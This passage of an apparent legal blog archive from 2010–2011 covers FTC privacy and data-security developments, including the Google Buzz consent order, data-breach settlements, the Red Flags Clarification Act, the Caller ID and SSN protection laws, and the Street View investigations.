It seems that Mr. Vladeck’ s letter had a significant impact on the ruling.  Curiously, only a small percentage of customers understand the value their PI may have for a company, even though PI may be sold as assets.

August 2, 2011

FTC Withdraws FCRA Commentary

Recently, the FTC withdrew its Statement of General Policy or Interpretations under the Fair Credit Reporting Act ("FCRA"), including the FTC's Commentary on the FCRA (the "Commentary'), the day before the authority to enforce and administer the FCRA transferred to the new Consumer Financial Protection Bureau (“CFPB”).

The FTC also released a staff report entitled "Forty Years of Experience with the Fair Credit Reporting Act."  This report provides background on the FTC's role in enforcing the FCRA, and includes a section-by-section summary of the agency’s interpretations of the FCRA. 

In announcing the withdrawal of the Commentary and release of the staff report, the FTC stated that the Commentary "has become partially obsolete since it was issued 21 years ago."  The new staff report deletes several interpretations in the Commentary that have since been repealed, modified or otherwise amended, and adds updated interpretations to reflect changes in the law since the Commentary was released in 1990.  The FTC stated that, given the Commentary's staleness, it "does not believe it is appropriate to transfer the Commentary."

Continue reading "FTC Withdraws FCRA Commentary" »

May 31, 2011

FTC Seeks Comments on "Dot Com Disclosures" Guide

The FTC has announced that it is seeking input from businesses on its guidance document regarding online advertising, "Dot Com Disclosures: Information About Online Advertising." 

The guide was originally published in 2000, and given the changing landscape of the online world, the FTC is seeking comment about how the guide should be modified to reflect these changes such as the use of mobile marketing, social media, and apps.  The Commission is interested in both the technical and legal issues marketers, consumer advocates and others want to be addressed.

The FTC will take comments until July 11, 2011.  Electronic comments can be submitted here.  Paper comments can be mailed or delivered to:  Federal Trade Commission, Office of the Secretary, Room H-113 (Annex I), 600 Pennsylvania Avenue, N.W., Washington, DC 20580.

May 4, 2011

FTC Settlements Demonstrate Need to Protect Employees’ Sensitive Information

Two recent settlements from companies that the FTC alleged failed to protect employees’ and business customers’ sensitive information highlights the FTC’s ongoing efforts to ensure that entities reasonably and appropriately protect sensitive information. According to the FTC, the entities involved in the recent settlement agreements claimed that they could provide other businesses with methods to protect and secure employees’ sensitive information.

For example, one of the entities—Ceridian Corporation—claimed that its security programs provided “Worry-free Safety and Reliability” and were designed in accordance with industry standards and best practices, and federal, state, and local requirements. Despite these promises, however, the FTC alleged that Ceridian did not adequately protect information from reasonably foreseeable attacks and stored personal information in an unsecured, unencrypted manner without a legitimate business need. According to the FTC, these lapses lead to a security breach that comprised approximately 28,000 employees of Ceridian’s business customers.

The other entity, Lookout Service, Inc., claimed that its security systems would keep data “reasonably secure from unauthorized access,” but did not take adequate measures to provide the promised security. The FTC’s complaint alleged that Lookout failed to require strong user passwords, failed to require periodic changes of such passwords, and failed to provide adequate employee training. Lookout experienced a data breach affecting the sensitive date, including Social Security numbers, of approximately 37,000 consumers.

The settlements require the companies to enact comprehensive information security programs and to obtain independent audits of the programs every other year for 20 years.

March 30, 2011

59th Antitrust Law Spring Meeting: Zeroing in on Behavioral Targeting

The ABA Antitrust Section spring meeting began March 30, 2011, and features a number of programs focusing on privacy and data security issues. In the “Zeroing in on Behavioral Targeting” program, panelists from the Federal Trade Commission (“FTC”), the Washington state attorney general’s office, and law firm privacy experts discussed current issues and legal actions involving online behavioral targeting.

Panelists included Becky Burr of WilmerHale; Tina Kondo, Deputy Attorney General with the Washington State Office of the Attorney General; Maneesha Mithal, Associate Director of the FTC’s Division of Privacy and Identity Protection; and David Parisi with Parisi & Havens, LLP.

Continue reading "59th Antitrust Law Spring Meeting: Zeroing in on Behavioral Targeting" »

Google Agrees to Settle FTC Charges and Will Implement a “Comprehensive Privacy Program”

The Federal Trade Commission (“FTC”) announced today that Google has agreed to settle FTC charges that it used deceptive tactics and violated its privacy promises when launching Google’s Buzz in 2010. Google will have to implement a “comprehensive privacy program,” as laid out in the proposed consent order. The  agreement is subject to public comment through May 1, 2011, after which the FTC will decide whether to make the proposed consent order final.

The proposed consent order refers to both the FTC Act and to the US-EU Safe Harbor Framework, a reference that is likely to be well appreciated in the European Union.

Agreement containing consent order available here.

Complaint available here.

The 2010 complaint

Google launched in February 2010 a social network within Gmail, Google Buzz (“Buzz”). Gmail users were sometimes set up with followers automatically, and without prior notice (Complaint at 7). These followers were the persons they emailed and chatted with the most in Gmail (Complaint at 8). Even if Gmail users chose to opt out of Buzz, they could nevertheless be followed by other Buzz users, and their public profile, if they had indeed created one, would then appear on their follower’s Google public profiles (Complaint at 8 and at 9).

The FTC complaint alleged that Google had violated the FTC Act, when it represented to consumers signing up for a Gmail account that Google would only use their information to provide them this webmail service, whereas Google also used this information to sign them up to Buzz automatically and without their consent. Also, Google represented that consumers would be able to control whether their information would be made public or not.

The complaint also alleged that Google did not adhere to the Safe Harbor Framework Privacy Principles of Notice and Choice, as Google did not give notice to users before using their personal information for a purpose different that than the one for which the data was originally collected. Also, Gmail users were not given a choice when Google used their information for a purpose incompatible for the purpose for which it was originally collected (Complaint at 25).

The complaint alleged that Google did not communicate “adequately” that “certain previously private information would be shared publicly by default,” and that the controls allowing users to change the defaults were “confusing and difficult to find” (Complaint at 9). Also, certain personal information was shared without Gmail users’ permission (Complaint at 10). For instance, individuals blocked by a Gmail user were not blocked in Buzz, and could be thus be a follower on Buzz (Complaint at 10).  Even more puzzling, it was not possible to block a follower who did not have a public Google profile, and the Gmail user could not even know this follower’s real identity (Complaint at 10).  Also, Buzz offered an @reply function which sometimes led to private mail addresses of contacts to be exposed to every followers, and could thus be found by search engines.

Google made some changes following widespread criticism and thousands of customer complaints. Users were given the ability to disable Buzz. Followers were no longer added automatically based on Gmail contacts, but merely suggested. Users could also block any follower, and Buzz users were given the option not to show their followers’ list on their public profile. The @reply function would no longer make private addresses public.

However, the FTC nevertheless issued a complaint in 2010, and Google has now agreed to settle.  

A comprehensive privacy program

The Buzz settlement is particularly interesting as it is the first time that an FTC settlement order requires a company to implement a comprehensive privacy program to protect the privacy of consumer data.

Indeed, the proposed consent order requires Google to implement a “comprehensive privacy program,” documented in writing, which must “(1) address privacy risks related to the development and management of new and existing products and services for consumers, and (2) protect the privacy and confidentiality of covered information” (proposed consent order p. 4). This program must designate which employees are responsible for the program. It must identify the reasonably foreseeable risks, external or internal, of Google collecting, using, or disclosing personal information without authorization, and put safeguards in place to prevent these risks. It must also design and implement “reasonable privacy controls and procedures, and regularly monitor the efficiency of privacy controls.” The program must also select service providers in charge of protecting personal data privacy, and enter into contracts with them. This comprehensive privacy program will be evaluated and adjusted if necessary, in light of its results (proposed consent order p. 4-5).

Also, Google will have to obtain from a qualified third-party professional an initial assessment, and then biennial assessments and reports, setting forth the specific privacy controls implemented by Google, explaining why such controls are appropriate, and explaining how they have been implemented. The third-party professional will also certify that such controls are effective (proposed consent order p. 5-6).

It will be interesting to see if U.S. companies will start to use the comprehensive privacy program framework as a reference for their own privacy programs,  and if EU Data Protection Agencies will require U.S. organizations that have self-certified to the U.S.-EU Safe Harbor Framework to implement such a privacy program to be deemed compliant.

 

March 22, 2011

Inside the Session: Chris Wolf on Behavioral Advertising at the 59th Antitrust Law Spring Meeting

 

Editor’s Note:  “Inside the Session” is a sneak preview of the privacy and information security-related sessions that will take place at  the 59th Antitrust Law Spring Meeting.  For more information on the conference, visit the ABA’s page on the event.

 

It’s no secret that, over the past several years, companies have embraced behavioral targeting to deliver personalized online advertising.  Nor is it any secret that legislators and regulators have been paying close attention to this topic.  The Secure Times recently spoke with Christopher Wolf, who will serve as session moderator of a Spring Meeting session entitled “Zeroing in on Behavioral Targeting”  Chris is a partner in the Washington, D.C. office of Hogan Lovell who practices in the field of privacy and data security law.  He also is the founder and co-chair of the Future of Privacy Forum think tank, which is examining the behavioral advertising issues.  He gave us a sneak preview of what to expect from the session on Wednesday, March 30, from 3:45-5:15pm.

 

Continue reading "Inside the Session: Chris Wolf on Behavioral Advertising at the 59th Antitrust Law Spring Meeting" »

March 14, 2011

FTC Settles With Chitika Ad Network Over Deceptive Opt-Out Mechanism

The Federal Trade Commission announced a proposed settlement today with Chitika, Inc., the operator of an online advertising network, ending Chitika’s allegedly deceptive practices related to the mechanism it provided allowing users to opt out of its online tracking. Chitika offers an online behavioral advertising service which places targeted ads on a publisher’s website and, according to its website, it has over 100,000 websites in its network, including salary.com and yellowbook.com.

Continue reading "FTC Settles With Chitika Ad Network Over Deceptive Opt-Out Mechanism" »

March 10, 2011

FTC publishes Top 10 Consumer Complaints of 2010. Identity Theft is Still Top Category

The Federal Trade Commission released yesterday a report on the Top 10 Consumer Complaints of 2010. The FTC received 1,339,265 complaints in 2010.

Identity theft was the number one category of complaint for the 11th year in a row. 250,854 complaints, that is, 19 percent, were related to identity theft. The most common form of reported identity theft was government documents/benefits fraud (19%), followed by credit card fraud (15%), phone or utilities fraud (14%), and employment fraud (11%). Victims also reported identity theft by bank fraud (10%) and loan fraud (4%).

Press release available here.

February 23, 2011

FTC Requests Court Shut Down Text Message Spammer

Yesterday, the FTC filed a complaint in the U.S. District Court for the Central District of California requesting a permanent injunction against Philip Flora, alleging violations of §5 of the FTC Act and CAN SPAM.

According to the complaint, the defendant sent millions of text messages, selling loan modification assistance, debt relief, and other services.  In a single 40-day period, the defendant sent more than 5.5 million spam text messages.  The text messages instructed consumers to reply to the message or to visit one of the defendant's websites.  The defendant collected information from consumers who responded, then sold their contact information to marketers as debt settlement leads.  The FTC alleged that consumers were harmed as a result of the defendant's spam text messages because many must pay fees to their mobile carriers to receive the unwanted messages.

The Commission charged that the defendant violated the FTC Act by sending unsolicited text messages to consumers and misrepresenting that he was affiliated with a government agency.  The Commission also charged the defendant with violating CAN SPAM by sending emails that advertised his text message blast service that failed to include an opt-out mechanism and the physical mailing address of the sender.

The FTC also acknowledged the "invaluable assistance" it received from Verizon Wireless, AT&T, and CTIA - The Wireless Association in its press release.

January 26, 2011

House Judiciary Committee Debates Mandatory Data Retention Requirements

On January 25, 2011, the United States House of Representatives Committee on the Judiciary’s Subcommittee on Crime, Terrorism, and Homeland Security (“Crime Subcommittee”) held a hearing regarding Internet service providers’ (“ISP”) and web hosting companies’, such as social-networking sites, data retention policies. According to a representative from the Department of Justice, who testified at the hearing, ISPs’ disparate data retention policies hamper criminal investigations and other law enforcement and prosecutor initiatives. The Department of Justice has recommended that Congress create mandatory data retention requirements to help facilitate law enforcement and prosecutor activities. No specific legislation was proposed during the Crime Subcommittee hearing; rather, legislators, and agency and industry representatives explored the need for data retention requirements.

Privacy advocates have questioned the implication of mandatory data retention requirements that would require entities to maintain sensitive consumer data, such as personally identifiable Internet address information, email, instant messaging correspondence, and what Web pages users visit. For example, past data retention legislation would have required certain Internet companies to maintain Internet protocol addresses for two years. These data retention proposals conflict with recent agency privacy-protection suggestions advocating the storage of less consumer data, such as the Federal Trade Commission’s proposed privacy framework, which suggests that businesses should “retain[] consumer data for only as long as they have a specific and legitimate business need to do so.”

More information regarding the Crime Subcommittee’s hearing is available here.

January 21, 2011

FTC Extends Deadline for Comments on Privacy Report to Feb. 18

The FTC announced today that it extended the deadline to comment on its preliminary staff report, "Protecting Consumer Privacy in an Era of Rapid Change: A Proposed Framework for Businesses and Policy Makers" until February 18.  Several organizations had requested this extension due to the size and complexity of the report.

To file comments electronically, click here.

January 5, 2011

Lame Duck Privacy Bills

In the last two weeks of 2010, President Obama signed the following three acts addressing privacy:

 

Red Flags Program Clarification Act of 2010

 

President Obama signed the “Red Flag Program Clarification Act of 2010,” S. 2987, (“Clarification Act”) on December 18, 2010, which became Public Law No: 111-319.  The Clarification Act narrows the definition “creditor” under the Fair Credit Reporting Act (FCRA) by adding a definition to Section 615(e), 15 U.S.C. § 1681m(e), to address issues with the breadth of the Federal Trade Commission’s Identity Theft Red Flags Rule (“Red Flag Rule”). 

 

The FTC’s Red Flag Rule was promulgated pursuant to the Fair and Accurate Credit Transactions Act, under which the FTC and other agencies were directed to draft regulations requiring “creditors” and “financial institutions” with “covered accounts” to implement written identify theft prevention programs to identify, detect and respond to patterns, practices or specific activities—the so called “red flags”—that could indicate identify theft.   The FTC interpreted the definition of “creditor” to include entities that regularly permit deferred payment for goods and services, which included lawyers, doctors, and other service providers not typically considered to be “creditors.”  This interpretation led to lawsuits by professional organizations, including the American Bar Association, the American Medical Association, and the American Institute of Certified Public Accountants, challenging the FTC’s position that the Red Flags Rule should apply to its members.

 

The Clarification Act limits the definition of creditor to entities that regularly and in the ordinary course of business: (i) obtain or use consumer credit reports, (ii) furnish information to consumer reporting agencies, or (ii) advance funds to or on behalf of a person.  The definition of creditor specifically excludes creditors that “advance funds on behalf of a person for expenses incidental to a service provided by the creditor to that person.”  However, the Clarification Act also allows the definition of creditor to be expanded by rules promulgated by the FTC or other regulating agencies to include creditors which offer or maintain accounts determined to be subject to a reasonably foreseeable risk of identity theft. 

 

S. 2987 was introduced and by Senator John Thune (R-S.D.) and co-sponsored by Mark Begich (D-Alaska) on November 30, 2010, and the Senate unanimously approved the bill the same day.  An identical companion bill was introduced in the House, H.R. 6420, by Representatives John Alder (D-N.J.), Paul Broun (R-Georgia), and Michael Simpson (R-Idaho) on November 17, 2010.  S. 2987 passed the House on December 7, 2010.

 

The FTC had previously delayed enforcement of the Red Flags Rule several times, most recently in May 2010 when it delayed enforcement through December 31, 2010.  The FTC’s Red Flags Rule website, http://www.ftc.gov/redflagsrule, notes that the FTC will be revising its Red Flags guidance to reflect the Clarification Act changes.

 

Social Security Number Protection Act of 2010

 

            President Obama also signed the “Social Security Number Protection Act of 2010,” S. 3789, on December 18, 2010, which became Public Law No: 111-318.  S. 3789 was introduced by Senator Dianne Feinstein (D-Cali.) and co-sponsored with bipartisan support, including Senator Judd  Gregg (R-N.H.).  The Act aims to reduce identity theft by limiting access to Social Security numbers, according to a statement from Senator Feinstein.

 

            The Act prohibits any federal, state, or local agency from displaying Social Security numbers, or any derivatives of such numbers, on government checks issued after December 18, 2013.  The Act also prohibits any federal, state or local entity agency from employing prisoners in jobs that would allow access to Social Security numbers after December 18, 2011.

 

            S. 3789 unanimously passed in the Senate on September 28, 2010, and passed in the House by voice vote under suspension of its rules on December 8, 2010. 

 

Truth in Caller ID Act of 2009

            On December 22, 2010, President Obama signed into law the “Truth in Caller ID Act,” S. 30, which became Public Law No: 111-331.  The Caller ID Act is intended to combat the problem of caller ID “spoofing” where identity thieves alter the name and number appearing as caller ID information in an attempt to trick people into revealing personal information over the phone.

 

            The Caller ID Act amended Section 227 of the Communications Act of 1934, 47 U.S.C. § 227, to make it illegal to knowingly transmit misleading or inaccurate caller identification information with the intent to defraud or cause harm.  However, the Caller ID Act specifically prohibits anything in it from being construed as preventing or restricting any person from using caller ID blocking. 

 

The Federal Communications Commission (“FCC”) is required to prescribe regulations to implement the Act within six months.  The Caller ID Act specifically exempts law enforcement activity and caller ID manipulation authorized by court order, and it also allows the FCC to define other exemptions by regulation.  

 

            The FCC can impose civil forfeiture penalties of up to $10,000 per violation, or $30,000 for each day of continuing violation, up to a cap of $1,000,000 for any single act or failure to act.  Willful and knowing violations of the Caller ID Act can result in criminal penalties including the same monetary penalties and up to a year in prison.

 

S. 30 was introduced by Senator Bill Nelson (D-Fla.) on January 7, 2009, and passed in the Senate on February 23, 2010.  The bill was approved in the House on December 15, 2010 by voice vote under suspension of its rules.  S. 30 was very similar to H.R. 1258 introduced by Representatives  Eliot Engel (D-N.Y.) and Joe Barton (R-Tex.) and passed by the House on April 14, 2010, according to a statement released by Representative Engle.

December 15, 2010

Connecticut Attorney General Initiates Investigation of Google's Street View

On December 10, 2010, Connecticut Attorney General Richard Blumenthal announced that his office is investigating whether Google violated state law by collecting data from unsecured wireless networks through it Street View cars. The Civil Investigative Demand, issued on December 10, 2010, requires Google to provide information regarding the type of data that was collected. Last May, Google acknowledged that it had inadvertently collected data from unprotected wireless networks in 30 countries. According to the Connecticut Attorney General’s press release, “Google initially claimed that the data was fragmented, but has since acknowledged that entire e-mails and other information may have been improperly captured.” In light of this disclosure, Connecticut initiated its investigation to verify the kind of data gathered and determine if it contains e-mails, passwords, web-browsing activity, and other private information. The Federal Trade Commission (“FTC”) previously investigated Google’s Street View incident and issued a letter closing the investigation in October 2010. More information about the FTC’s investigation is available here.

December 10, 2010

FTC Seeks Comments on Caller ID Provisions of Telemarketing Sales Rule

On December 7, the FTC announced that it was seeking comments on ways to strengthen the Telemarketing Sales Rule's requirements related to the use of Caller ID.  Currently, the Rule allows consumers to screen out unwanted telemarketing calls by requiring telemarketers to provide Caller ID information.  The FTC is seeking comments on how to address technologies that hide callers' identities.  Comments are due by Jan. 28, 2011.

Continue reading "FTC Seeks Comments on Caller ID Provisions of Telemarketing Sales Rule" »

December 7, 2010

Announcing Program on the FTC's New Privacy Report

Please join us Tuesday, December 14th from 12noon-1:30pm for a telephonic program:  The FTC's New Privacy Report:  What You Need to Know.  The featured speaker will be Jessica Rich, Deputy Director of the FTC's Bureau of Consumer Protection.  She will provide background on the report, highlight its key proposals, and discuss the process going forward, including the opportunity to submit public comments in response to the proposed framework.  The session, which will include a Q&A opportunity, will be moderated by two distinguished privacy scholars, Fred Cate of Indiana University School of Law and Jeffrey Rosen of The George Washington University Law School.  Don't miss this chance to hear directly from the FTC about the report!

The program is sponsored by the ABA Antitrust Section's Privacy and Information Security, Civil Enforcement, Consumer Protection and Private Advertising Litigation Committees. 

To register, click here.

December 1, 2010

"Do Not Track" - House Committee Hearings - Dec. 2

The House Commerce Committee's hearing on the FTC's proposed "Do Not Track" registry is scheduled for tomorrow, December 2nd. Details, along with a witness list, are on the House Commerce Committee's website.
According to the announcement, the hearing "will examine the feasibility of establishing a mechanism that provides Internet users a simple and universal method to opt-out from having their online activity tracked by data-gathering firms."  It not clear whether tomorrow’s hearing will address hybrid online/offline tracking. Apple responded in July to a Congressional letter regarding its GPS-based tracking practices, but it is not on the invited witness list.
The concept of a universal “Do Not Track” list traces back to at least 2007, when an alliance of privacy groups proposed a list to the FTC, modeled after the FTC’s successful “Do Not Call” list (See Wall Street Journal Article).  

November 14, 2010

Congress and President Obama’s Administration Continue to Debate Privacy Regulation

The Obama administration recently announced that it is preparing a report that will be issued by the U.S. Commerce Department regarding Internet privacy regulation. The Commerce Department’s report is intended to outline the Obama administration’s approach to regulating Internet privacy and steps that should be taken to protect consumers’ online privacy. While the report purportedly does not recommend specific legislation, it does indicate that self-regulation is not as robust and effective as the administration believes privacy protection should be and that Internet privacy protection should be strengthened. The Commerce Department’s report is expected to be released in the next few weeks.

This announcement follows the creation by the White House of a National Science and Technology Council Subcommittee on Privacy and Internet Policy, comprised of representatives from federal departments, agencies, and offices, including the Department of Commerce, the Federal Trade Commission (“FTC”), and the Federal Communications Commission (“FCC”). In addition to the Obama Administration’s efforts regarding privacy protection, the FTC has indicated that it will release a comprehensive report by the end of the year regarding the “Exploring Privacy” roundtables that were hosted by the Commission in fall 2009 and early 2010. The report will also contain recommendations for privacy protection and changes to the FTC’s privacy protection framework. Further, Representative Joe Barton (R-TX), currently the ranking minority member of the House of Representatives Committee on Energy and Commerce, has indicated that he intends to support tougher Internet privacy polices when Congress begins its January 2011 session.

October 27, 2010

FTC Steps Down from Google Data Privacy Investigation, U.K. Back On Board

Oct. 27, 2010. The Federal Trade Commission today posted a letter to Google’s counsel announcing that it is ending its inquiry into Google’s collection of information sent over unsecured wireless networks. The inquiry began after Google revealed in May 2010 that its Street View cars had been collecting more than just WiFi location information such as SSID information and MAC addresses. Instead, Google had also been capturing “payload” data sent over unsecured wireless networks. The May announcement came after the data protection authority in Hamburg, Germany, requested an audit of the Street View data.
 
Google’s May revelation generated a flurry of media attention (e.g. from the Wall Street Journal and New York Times), and regulatory investigations in the United States, Germany, Canada, Australia, the U.K., South Korea, and elsewhere. Several class-action lawsuits also resulted. 
 
Last week, on October 22, 2010 Google announced on its U.S. website that it has taken steps to improve its privacy practices, including appointing a new director of privacy to oversee both the engineering and product management groups, enhancing its privacy training, and implementing new internal privacy compliance practices.  This announcement, together with Google’s promise to delete the payload data as soon as possible, and assurance that it will not use the data in any product or service, appears to have appeased the FTC. The FTC’s letter did not contain any determination about whether Google’s actions did or did not breach any data privacy laws, nor did it require any remedial action or fines. Australia, in contrast, had concluded in June that Google violated Australia’s privacy laws, and required Google to publicly apologize, to conduct a Privacy Impact Assessment, and regularly consult with the Australian office about data collection. 
 
Google also acknowledged that – contrary to its earlier postings – “in some instances entire emails and URLs were captured, as well as passwords.” While Google’s October 22 posting satisfied the FTC, this revelation caused the U.K. to announce that is re-opening its investigation into Google's privacy practices.  The U.K.  had closed its investigation in July after reviewing sample payload data, concluding that personal data, emails and passwords were not collected.  

September 27, 2010

Global Privacy Enforcement Authorities Launch Cooperative Network and Website

The United States Federal Trade Commission ("FTC") recently joined forces with privacy authorities from eleven other countries to launch the Global Privacy Enforcement Network ("GPEN"), which aims to promote cross-border information sharing and enforcement of privacy laws. On September 21, 2010, GPEN unveiled its new website, https://www.privacyenforcement.net/, designed to educate the public about the network. The GPEN website, which is supported by the Organization for Economic Co-Operation and Development ("OECD"), provides guidelines and application instructions for government agencies interested in participating in GPEN. It also sets forth GPEN’s action plan and mission of “sharing information about privacy enforcement issues, trends and experiences; participating in relevant training; cooperating on outreach activities; engaging in dialogue with relevant private sector organizations on privacy enforcement and outreach issues; and facilitating effective cross-border privacy enforcement in specific matters by creating a contact list of privacy enforcement authorities interested in bilateral cooperation in cross-border investigations and enforcement matters.”

In his remarks about the network, which was officially launched in March, FTC Chairman Jon Leibowitz stated that “to protect consumers’ privacy in today’s global economy, all of us who work in law enforcement around the world need to cooperate with each other. We at the FTC are looking forward to working closely with our colleagues overseas to make this happen.”

April 22, 2010

Today at the ABA: Expanding the FTC's Role through Financial Reform

The big question being debated at this morning’s session on financial reform legislation and the proposed Consumer Financial Protection Agency/Bureau: how will the legislation impact the FTC’s authority, both in terms of rulemaking and imposition of civil penalties?

In December 2009, the House passed the “Wall Street Reform and Consumer Protection Act of 2009” (HR 4173). An important provision in the bill would strip the FTC of its powers to regulate consumer financial protection -- while also expanding the agency’s powers in two key ways. First, by giving the FTC “APA” rulemaking authority for areas that fall within the FTC’s jurisdiction and second, by giving the agency greater latitude to assess civil penalties for unfair and deceptive practices.

These amendments will surely impact FTC enforcement of online advertising, marketing, privacy, and data security. For instance, violations under the FTC’s expanded authority could trigger civil penalties even in the absence of an FTC order. Civil penalties would be assessed in antitrust cases brought by the FTC that include a consumer protection claim.

In addition, the HR 4173 language that expands the FTC’s authority would impose liability on companies that “substantially assist” in an unlawful act, even if the company does not have direct knowledge or responsibility for the violation. This provision will probably raise some serious concerns for companies currently enjoying a safe harbor under the Communications Decency Act.

Today, FTC rulemaking jurisdiction comes in two flavors – “APA” rulemaking under certain laws as prescribed by Congress e.g. the Children’s Online Privacy Protection Act, as well as general rulemaking authority under the 1975 Magnusson-Moss Act. Under the latter, the FTC can only regulate “prevalent” unfair and deceptive acts, and must justify that regulation with “substantial evidence.” The key difference between these two types of rulemaking occurs during judicial review; a court can overturn an FTC regulation under Magnusson-Moss if the rule lacks a substantial evidentiary record to support it. In contrast, FTC regulations enacted under the APA rulemaking scheme, such as those implementing COPPA, can only be overturned if the agency was "arbitrary or capricious" in enacting the rule – a much higher standard. As former FTC Chairman Muris explained in his presentation at the panel, Magnusson-Moss gives the FTC authority to act only when a problem occurs often enough to justify a rule, or when a problem has a common cause in a sufficient number of cases.

Current FTC Chairman Jon Leibowitz, supported by President Obama and the Administration, has strongly advocated for an expansion in the FTC’s authority, stating that it is “critical” for the FTC to carry out its mission of protecting consumers. In particular, Leibowitz has argued that the procedural requirements of Magnusson-Moss – such as the requirement that a practice be prevalent before the agency can act - makes FTC rulemaking more burdensome than at most other federal agencies. Although the relevant amendments expanding the FTC’s power are missing from the Senate version of the legislation, it is widely expected that these differences will be worked out in conference. Financial reform legislation appears to be on a fast track - earlier today, a Senate panel approved the bill, and both Republicans and Democrats have indicated that passage is likely.

The CFPA would be a new independent federal agency – the composition of which would vary depending on whether you are looking at the House Bill (5 members and a Director for two years) or Senate Bill (5 members). Its enactment would strip the FTC and other federal banking agencies of their federal consumer protection powers under a number of laws, including the Electronic Funds Transfer Act, the Equal Credit Opportunity Act, the Fair Credit Reporting Act, the Fair Debt Collection Practices Act, the Home Mortgage Disclosure Act, the Real Estate Settlement Procedures Act, the Secure and Fair Enforcement for Mortgage Licensing Act, the Truth in Lending Act and the Truth in Savings Act. In short, any product or service that results from or is related to engaging in a financial activity and that is to be used by a consumer “primarily for personal, family or household purposes” will come under the new agency’s purview.

At today’s session, we saw differing viewpoints from both Tim Muris, former FTC Chairman, and Julie Brill, incoming FTC Commissioner, on this current push to expand the FTC’s authority under financial reform legislation.

Former Chairman Muris views the FTC’s current role as important, and he sees FTC rulemaking as relevant in certain areas – e.g. the do-not-call rules. He is concerned about the current proposals to expand the FTC’s authority because the agency often lacks industry-specific knowledge and expertise (I see this most recently in the area of privacy, as the FTC is currently gleaning this knowledge through its Exploring Privacy roundtable series). Muris also thinks the agency’s rulemaking authority under Magnusson-Moss is more than sufficient as it imposes an obligation on the agency to be clear about its proposed theories while focusing its evidence on key questions. He cites the agency’s recent business opportunity rulemaking as an example of an instance where the FTC initially proposed a broad rule that would have disproportionately impacted both fraudulent and legitimate business. The FTC eventually narrowed its proposed business opportunity rule after the public comment process.

On civil penalties, Muris thinks these are important only when a company violates an FTC order or rule. He sees blanket civil penalty authority as a mistake that may have unintended consequences – such as a penalty on a firm’s stock price. He’s also concerned that the standard of review laid out in the financial reform legislation will return the FTC’s definition of unfairness to its pre 1994 definition i.e. the Sperry-Hutchinson or "cigarette rule" which defines an unfair practice as one that is injurious to consumers, violate established public policy or is it unethical or unscrupulous. As many know, Congress amended the FTC Act in 1994 to specify that an unfair act or practice is one that causes or is likely to cause substantial injury to consumers that is not reasonably avoidable and is not outweighed by countervailing benefits to consumers or competition.

Providing a counterpoint to Muris’ remarks, FTC Commissioner Julie Brill, speaking “on behalf of herself,” is generally in favor of expanding the FTC’s authority. She sees the FTC as both a law enforcement and regulatory agency. She views civil penalties as just “one of the arrows” in the FTC’s quiver – not to be used in every instance, but as appropriate. As a law enforcer, she does not see the FTC’s request to have civil penalty authority as unusual – since most state AGs already have this type of authority. To view such penalties as “automatic” is particularly misleading to her, since the FTC would only be able to obtain such penalties after judicial review in court. Brill also sees the FTC as a regulatory agency and notes that APA rulemaking is enjoyed by most other federal agencies. In addition, she points out that APA rulemaking under the proposed amendments would also be subject to review by a judge in court. Brill also views civil penalties as helpful in quantifying equitable remedies to compensate consumers for their injury - e.g. disgorgement or restitution for data breach violations.

Taking a broader view of the situation, Brill sees an expansion of the FTC's authority as a way to make the agency's enforcement efforts more effective – which benefits both consumers and competition in the long run. She also feels that consumers want an agency that has the right enforcement tools – not an “emasculated” FTC - and finds it surprising that the issue is even being debated, given the events of the financial meltdown and the current economic recession.

On the subject of FTC regulation, Brill is strongly in favor of an update, noting that rulemaking under Magnusson-Moss can often take up to 8 – 10 years. She recalls comments she made on the hearing aid rule as an Assistant AG in Vermont in 1992 – rules that have yet to be issued, nearly 20 years later. Her statements suggest that expanded rulemaking authority might give companies in dynamic industries – such as technology - FTC regulation that actually keeps pace with innovation.

The question of course, is whether such FTC regulation would also stifle innovation preemptively. Companies have started to take note of the recent push to expand the FTC’s power, and it is likely that the topic will continue to be debated fiercely in the coming weeks as financial reform legislation comes to a vote. Some have even expressed concerns that such an expansion of the FTC’s rulemaking authority could impact funding and investment in technology and Internet companies by both Wall Street and Silicon Valley VCs. For more, take a look at this transcript of the Progress & Freedom Foundation’s recent forum entitled “Supersizing the FTC.”

February 26, 2010

FTC Appeals Judge Walton's Decision on Red Flags Rule

Yesterday, February 25, 2010, the Federal Trade Commission filed notice of appeal to the DC Circuit Court of Appeals to attempt to reverse Judge Walton’s ruling late last year that the FTC cannot require practicing lawyers to comply with the Red Flags Rule.  In August 2009, the American Bar Association challenged the applicability of the Red Flags Rule to lawyers, arguing that it would impose a serious burden on law firms.  At that time, the ABA sought an injunction and declaratory judgment finding that lawyers were not covered. The FTC replied that lawyers should be covered because billing practices, such as charging clients on a monthly basis rather than upfront, made them “creditors” under the plain language of the Red Flags Rule. Judge Walton ruled from the bench in late October and issued his Order and Memorandum Opinion in December.  

Continue reading "FTC Appeals Judge Walton's Decision on Red Flags Rule" »

February 24, 2010

FTC Releases Report of Top Consumer Complaints

On February 24, 2010, the Federal Trade Commission (“FTC”) released the “Consumer Sentinel Network Data Book” (“Report”).  This Report includes a listing of the top consumer complaints reported in 2009 to the FTC. 

 

The top ten complaints for 2009 are:

 

Rank

Category

No. of Complaints

1

Identity Theft

278,078

2

Third Party and Creditor Debt Collection

119,549

3

Internet Services

83,067

4

Shop-at-Home and Catalog Sales

74,581

5

Foreign Money Offers & Counterfeit Check Scams

61,736

6

Internet Auction

57,821

7

Credit Cards

45,203

8

Prizes, Sweepstakes and Lotteries

41,763

9

Advance-Fee Loans and Credit Protection/Repair

41,448

10

Banks and Lenders

32,443

February 22, 2010

Federal Trade Commission to Host Third Roundtable on Privacy

The Federal Trade Commission (“FTC”) is preparing for the third and final roundtable discussion on privacy.  The first roundtable was held in December 2009 in Washington, DC, to explore privacy implications of developing technology and business practices that collect and use of consumer data.  This event was followed by a second roundtable in Berkley, CA in January 2010.  The discussion in Berkley focused on benefits and risks created by technology and the privacy implications of social networking, cloud computing, and mobile marketing. 

 

The third roundtable will be held on March 17, 2010 in Washington, DC.  At this event, panelists will discuss the collection and use of “sensitive” information.  In preparation for this roundtable, the FTC has requested comments on the following issues:

 

  • How can we best achieve accountability for best practices or standards for commercial handling of consumer data?  Can consumer access to and correction of their data be made cost effective?  Are there specific accountability or enforcement regimes that are particularly effective? 
  • What potential benefits and concerns are raised by emerging business models built around the collection and use of consumer health information?  What, if any, legal protections do consumers expect apply to their personal health information when they conduct online searches, respond to surveys or quizzes, seek medical advice online, participate in chat groups or health networks, or otherwise?
